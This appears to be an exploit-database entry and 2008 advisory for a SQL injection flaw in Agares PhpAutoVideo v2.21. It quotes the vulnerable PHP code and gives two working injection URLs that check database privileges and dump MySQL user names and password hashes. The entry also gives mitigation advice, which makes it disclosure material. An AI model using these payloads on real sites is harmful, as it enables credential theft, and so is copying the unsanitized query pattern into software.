Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability

vendor:

PhpAutoVideo

by:

D.O.M TEAM (ka0x, an0de, xarnuz)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PhpAutoVideo

Affected Version From: 2.21

Affected Version To: 2.21

Patch Exists: NO

Related CWE: N/A

CPE: a:agares_media:phpautovideo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability

Agares PhpAutoVideo v2.21 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the user and password from the mysql.user table.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
bug found by ka0x
concat: ka0x01[at]gmail.com>
#from spain

vulnerability in /includes/articleblock.php

vuln code:
------------------------------------------------------------------
$cat = $_GET['articlecat'];
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }
------------------------------------------------------------------

Your user needs to be root@localhost or administrator mysql, check:
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*

user and password from mysql.user:
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*

# milw0rm.com [2008-01-12]